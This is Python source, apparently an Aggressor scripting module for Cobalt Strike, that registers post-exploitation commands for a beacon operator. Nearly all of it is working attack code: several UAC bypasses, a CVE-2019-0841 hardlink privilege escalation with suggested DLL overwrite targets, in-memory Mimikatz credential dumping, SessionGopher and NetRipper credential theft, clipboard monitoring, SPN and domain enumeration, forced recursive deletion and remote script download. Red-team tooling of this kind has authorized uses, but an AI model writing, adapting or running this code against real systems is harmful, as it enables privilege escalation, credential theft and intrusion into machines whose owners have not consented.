def _(bid, pattern, out=None):
import_host_recon(bid)
command = 'Get-IndexedFiles {}'.format(powershell_quote(pattern))
if out:
# output to file
command += ' > {}'.format(powershell_quote(out))
aggressor.bpowerpick(bid, command)
def run(bid, program, args=None, silent=False):
# no args
if not args:
args = []
if program in assemblies:
assembly = assemblies[program]
args = helpers.eaq(args)
if not silent:
aggressor.btask(bid,
'Tasked beacon to run {} {}'.format(program, args))
aggressor.bexecute_assembly(bid, assembly, args, silent=True)
elif program in powershell:
script = powershell[program]
aggressor.bpowershell_import(bid, script)
if isinstance(args, list) or isinstance(args, tuple):
args = ' '.join(powershell_quote(args))
aggressor.bpowerpick(bid, ' '.join(args))
elif program in callbacks:
callback = callbacks[program]
callback(bid, args, silent=silent)
else:
raise RuntimeError('Unrecognized program: {}'.format(program))
def elevate_token_shellcode_csharp(bid, shellcode):
"""
Elevate with token duplication bypass. Execute `shellcode` with a C# helper.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
execute_assembly = utils.basedir('tools/execute_assembly.exe')
stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
#stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
package = r'{}\nuget.package'.format(helpers.guess_temp(bid))
helpers.upload_to(bid, execute_assembly, stage1)
helpers.upload_to(bid, execute_shellcode, stage2)
helpers.upload_to(bid, shellcode, package)
command = 'Invoke-TokenDuplication -Binary {}'.format(
powershell_quote(stage2))
aggressor.bpowerpick(bid, command)
aggressor.brm(bid, stage1)
aggressor.brm(bid, stage2)
aggressor.brm(bid, package)
def elevate_slui_command(bid, command):
"""
Elevate with slui bypass.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
aggressor.bpowerpick(
bid, 'Invoke-SluiBypass -Command {}'.format(powershell_quote(command)))
def _(bid, out=None):
aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1'))
command = 'Get-AccountSPNs'
if out:
# output to file
command += ' > {}'.format(powershell_quote(out))
aggressor.bpowerpick(bid, command)
def elevate_eventvwr_command(bid, command):
"""
Elevate with eventvwr bypass.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/Invoke-EventVwrBypass.ps1'))
aggressor.bpowerpick(
bid,
'Invoke-EventVwrBypass -Command {}'.format(powershell_quote(command)))
def elevate_wscript_command(bid, command):
"""
Elevate with wscript bypass.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/Invoke-WScriptBypassUAC.ps1'))
aggressor.bpowerpick(
bid, 'Invoke-WScriptBypassUAC -payload {}'.format(
powershell_quote(command)))
def elevate_cve_2019_0841(bid, target, overwrite=None):
r"""
Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally
overwrite 'target' with 'overwrite'.
Good overwrite options:
- C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate)
- C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually)
"""
native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1')
edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*'
settings_dat = r'\Settings\settings.dat'
command = helpers.code_string(r"""
# Stop Edge
echo "[.] Stopping Edge"
$process = Get-Process -Name MicrosoftEdge 2>$null
if ($process) {{
$process | Stop-Process
}}
sleep 3
# Hardlink
$edge_dir = Resolve-Path {edge_dir}
$settings_dat = $edge_dir.Path + '{settings_dat}'
echo "[.] Making Hardlink from $settings_dat to {target}"
rm $settings_dat
Native-HardLink -Verbose -Link $settings_dat -Target {target}
# Start Edge
echo "[.] Starting Edge"
Start Microsoft-Edge:
sleep 3
# Stop it again
echo "[.] Stopping Edge"
$process = Get-Process -Name MicrosoftEdge 2>$null
if ($process) {{
$process | Stop-Process
}}
echo "[+] All Finished!"
echo "[.] New ACLs:"
Get-Acl {target} | Format-List
""".format(edge_dir=edge_dir,
settings_dat=settings_dat,
target=powershell_quote(target)))
aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True)
aggressor.bpowerpick(bid, command, silent=True)
if overwrite:
helpers.upload_to(bid, overwrite, target)
helpers.explorer_stomp(bid, target)
def elevate_token_command(bid, command, *other_args):
"""
Elevate with token duplication bypass. Execute `command` with `arguments`.
"""
command, *arguments = command.split()
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
powershell = 'Invoke-TokenDuplication -Binary {} '.format(
powershell_quote(command))
if arguments:
powershell += '-Arguments {} '.format(
powershell_quote(' '.join(arguments)))
if other_args:
powershell += ' '.join(other_args)
aggressor.bpowerpick(bid, powershell)
def _(bid, *dirs):
# default dir is .
if not dirs:
dirs = ['.']
command = 'ls '
command += ', '.join([powershell_quote('{}\*\*'.format(d)) for d in dirs])
aggressor.btask(bid,
'Tasked beacon to list */* in: {}'.format(', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs):
if not dirs:
aggressor.berror(bid, 'rmr: specify some directories to kill')
return
command = ''
for d in dirs:
command += 'Remove-Item -Recurse -Force {}\n'.format(
powershell_quote(d))
aggressor.btask(
bid, 'Tasked beacon to recursively delete: {}'.format(', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs):
# default dir is .
if not dirs:
dirs = ['.']
command = ''
for d in dirs:
command += 'Get-ChildItem -Recurse {}\n'.format(powershell_quote(d))
aggressor.btask(
bid, 'Tasked beacon to recursively list files in: {}'.format(
', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *hosts):
command = ''
if not hosts:
aggressor.berror('specify a host')
return
for host in hosts:
command += 'nslookup {}\n'.format(powershell_quote(host))
aggressor.btask(
bid, 'Tasked beacon to resolve host(s): {}'.format(', '.join(hosts)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs):
# default dir is .
if not dirs:
dirs = ['.']
command = ''
for d in dirs:
command += 'Get-ChildItem {} | % {{ fsutil reparsepoint query $_ }}\n'.format(
powershell_quote(d))
aggressor.btask(
bid, 'Tasked beacon to list links in: {}'.format(', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *lnks):
command = '$sh = New-Object -ComObject WScript.Shell'
for lnk in lnks:
command += helpers.code_string(r"""
$shortcut = $sh.CreateShortcut({})
#$target = $shortcut.TargetPath
#$arguments = $target.Arguments
#echo "$target $arguments"
echo "$shortcut.TargetPath $target.Arguments"
""".format(powershell_quote(lnk)))
aggressor.btask(bid,
'Tasked beacon to read links: {}'.format(', '.join(lnks)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, command, *args):
script_file = utils.basedir(
'powershell/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1')
with open(script_file, 'r') as fp:
script = fp.read()
# host it
cmd = aggressor.beacon_host_script(bid, script)
time.sleep(10)
# execute in-memory hosted script
engine.message(cmd)
aggressor.bpowerpick(
bid, cmd + ';\n Invoke-Mimikatz -Command {} {}'.format(
command, ' '.join(powershell_quote(args))))
def _(bid, *dirs):
# default dir is .
if not dirs:
dirs = ['.']
#command += "Where-Object { -not \$_.PsIsContainer } |
command = ''
for d in dirs:
command += helpers.code_string(r"""
Get-ChildItem -Path {} |
Sort-Object LastWriteTime -Ascending;
""".format(powershell_quote(d)))
aggressor.btask(
bid, 'Tasked beacon to do a sorted-by-time list of: {}'.format(
', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, url):
if ':' not in url:
# add scheme
url = 'http://' + url
command = helpers.code_string(r"""
$request = [System.Net.WebRequest]::Create({})
""".format(powershell_quote(url)))
command += helpers.code_string(r"""
$response = $request.GetResponse()
$headers = $response.Headers
$headers.AllKeys |
Select-Object @{ Name = "Key"; Expression = { $_ }},
@{ Name = "Value"; Expression = { $headers.GetValues( $_ ) } }
""")
aggressor.btask(bid,
'Tasked beacon to get headers for URL: {}'.format(url))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
temp = helpers.guess_temp(bid)
# Forests and trusts:
# Get-DomainTrustMapping
# Get-ForestTrust
# Get-DomainTrust
# Parsing GPOs:
# Get-GptTmpl
# Get-GroupsXML
# File shares:
# Get-DomainFileServer
# Get-DomainDFSShare
# Get-DomainManagedSecurityGroup?
# TODO remove subnet and site?
# computer objects don't show up in Get-DomainObject for some reason
command = helpers.code_string(r"""
cd {}
$FormatEnumerationLimit=-1
Get-DomainObject | Format-List -Property * > objects.domain
Get-DomainPolicyData | Format-List -Property * > policy.domain
Get-DomainSite | Format-List -Property * > sites.domain
Get-DomainSubnet | Format-List -Property * > subnets.domain
Get-DomainGPOUserLocalGroupMapping | Format-List -Property * > gpo_localgroups.domain
Get-GPODelegation | Format-List -Property * > gpo_delegations.domain
Get-DomainGPO | %{{Get-ObjectACL -ResolveGUIDs -Name $_.Name}} > gpo_acls.domain
Get-DomainTrustMapping | Format-List -Property * > trusts.domain
Get-DomainManagedSecurityGroup | Format-List -Property * > managers.domain
Invoke-ACLScanner -ResolveGUIDs > interesting_acls.domain
echo "All finished with domain-enum. Run domain-enum-next."
""".format(powershell_quote(temp)))
aggressor.btask(
bid, 'Tasked beacon to enumerate domain objects and info (stage 1/3)')
external.run(bid, 'powerview', command)
def _(bid, *dirs):
# default dir is .
if not dirs:
dirs = ['.']
command = ''
for d in dirs:
command += """
gci {} |
""".format(powershell_quote(d))
command += helpers.code_string(r"""
%{$f=$_; gci -r $_.FullName |
measure-object -property length -sum |
select @{Name="Name"; Expression={$f}},
@{Name="Sum (MB)";
Expression={"{0:N3}" -f ($_.sum / 1MB) }}, Sum } |
sort Sum -desc |
format-table -Property Name,"Sum (MB)", Sum -autosize;
""")
aggressor.btask(
bid, 'Tasked beacon to get file sizes in: {}'.format(', '.join(dirs)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args):
parser = helpers.ArgumentParser(bid=bid, prog='find')
parser.add_argument('-n', '--name', action='append', help='Name to match')
parser.add_argument('-i',
'--iname',
action='append',
help='Name to match (case insensitive)')
parser.add_argument('--not',
dest='not_',
action='store_true',
help='Invert --name and --iname')
parser.add_argument('-d',
'--days',
type=int,
help='Select files no more than DAYS old')
parser.add_argument('--dirs',
action='store_true',
help='Include directories')
parser.add_argument('-o', '--out', help='Output file')
parser.add_argument('-v',
'--verbose',
action='store_true',
help='Enable verbose')
parser.add_argument('--home',
action='store_true',
help='Search relative to %USERPROFILE% instead of .')
parser.add_argument('dir',
default='.',
help='Directory to search from (default: .)')
try:
args = parser.parse_args(args)
except:
return
# --home
if args.home:
directory = r'$env:userprofile\{}'.format(powershell_quote(args.dir))
else:
directory = powershell_quote(args.dir)
command = 'gci -Recurse -Path {} 2>$null'.format(directory)
# --dirs
if not args.dirs:
command += ' | where { ! $_.PSIsContainer }'
name_matches = []
# -n/--name
if args.name:
for name in args.name:
name_matches.append('$_.Name -Clike {}'.format(
powershell_quote(name)))
# -i/--iname
if args.iname:
for iname in args.iname:
name_matches.append('$_.Name -Like {}'.format(
powershell_quote(iname)))
if name_matches:
where_statement = ' -Or '.join(name_matches)
# --not
if args.not_:
where_statement = '-Not ({})'.format(where_statement)
command += " | Where-Object { " + where_statement + " }"
# -d/--days
if args.days:
command += ' | ? { $_.LastWriteTime -Ge (Get-Date).AddDays(-{}) }'
# -o/--out
if args.out:
command += ' > {}'.format(powershell_quote(args.out))
command += "; echo 'Finished searching in {}'".format(directory)
aggressor.btask(
bid, 'Tasked beacon to search for files in {}'.format(directory))
# -v/--verbose
aggressor.bpowerpick(bid, command, silent=not args.verbose)
def _(bid, *exes):
command = ''
if not exes:
raise RuntimeError('describe: Specify at least one exe to describe')
for exe in exes:
command += '"{0}, {1}" -f $_.Name, [System.Diagnostics.FileVersionInfo]::GetVersionInfo(' + powershell_quote(
exe) + ').FileDescription }\n'
aggressor.btask(
bid,
'Tasked beacon to show version info for: {}'.format(', '.join(exes)))
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args):
aggressor.bpowershell_import(bid,
utils.basedir('powershell/SessionGopher.ps1'))
aggressor.bpowerpick(
bid, 'Invoke-SessionGopher ' + ' '.join(powershell_quote(args)))
def _(bid, *args):
aggressor.bpowershell_import(
bid, utils.basedir('powershell/Invoke-NetRipper.ps1'))
aggressor.bpowerpick(
bid, r'Invoke-NetRipper -LogLocation C:\Temp\ ' +
' '.join(powershell_quote(args)))
def _(bid, *args):
aggressor.bpowershell_import(bid, utils.basedir('powershell/Start-ClipboardMonitor.ps1'))
aggressor.bpowerpick(bid, 'Start-ClipboardMonitor {}'.format(' '.join(powershell_quote(args))))
def _(bid, url):
aggressor.bpowerpick(
bid, '(New-Object System.Net.WebClient).DownloadString({})'.format(
powershell_quote(url)))
def _(bid, fname, lines=10):
aggressor.btask('Tasked beacon to get tail of {}'.format(fname))
aggressor.bpowerpick(bid,
'gc {} | select -last {} '.format(
powershell_quote(fname), lines),
silent=True)
